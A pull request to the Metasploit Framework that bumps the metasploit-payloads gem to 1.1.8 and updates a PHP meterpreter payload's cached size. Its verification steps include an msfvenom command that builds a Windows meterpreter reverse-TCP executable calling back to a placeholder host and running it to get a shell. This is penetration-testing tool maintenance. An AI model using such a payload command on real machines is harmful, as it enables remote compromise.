### PR TITLE
Update metasploit-payloads to 1.1.8

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -13,7 +13,7 @@ PATH
       metasploit-concern
       metasploit-credential (= 1.1.0)
       metasploit-model (= 1.1.0)
-      metasploit-payloads (= 1.1.6)
+      metasploit-payloads (= 1.1.8)
       metasploit_data_models (= 1.3.0)
       msgpack
       network_interface (~> 0.0.1)
@@ -130,7 +130,7 @@ GEM
       activemodel (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       railties (>= 4.0.9, < 4.1.0)
-    metasploit-payloads (1.1.6)
+    metasploit-payloads (1.1.8)
     metasploit_data_models (1.3.0)
       activerecord (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)

--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model', '1.1.0'
   # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '1.1.6'
+  spec.add_runtime_dependency 'metasploit-payloads', '1.1.8'
   # Needed by msfgui and other rpc components
   spec.add_runtime_dependency 'msgpack'
   # get list of network interfaces, like eth* from OS.

--- a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
@@ -12,7 +12,7 @@ require 'msf/base/sessions/meterpreter_options'
 
 module MetasploitModule
 
-  CachedSize = 26778
+  CachedSize = 26803
 
   include Msf::Payload::Single
   include Msf::Payload::Php::ReverseTcp


### PR DESCRIPTION
## What this patch does

This updates the metasploit-payloads gem
See https://github.com/rapid7/metasploit-payloads/pull/96
## Verification
- [x] run `bundle` to get the new gem
- [x] generate a meterpreter payload for testing, for example:  `./msfvenom -p windows/meterpreter/reverse_tcp lhost=IP lport=4444 -f exe -o /tmp/test.exe`
- [x] Copy the exe to a windows machine
- [x] Start a listener for windows/meterpreter/reverse_tcp
- [x] Double click on the exe, you should get a shell
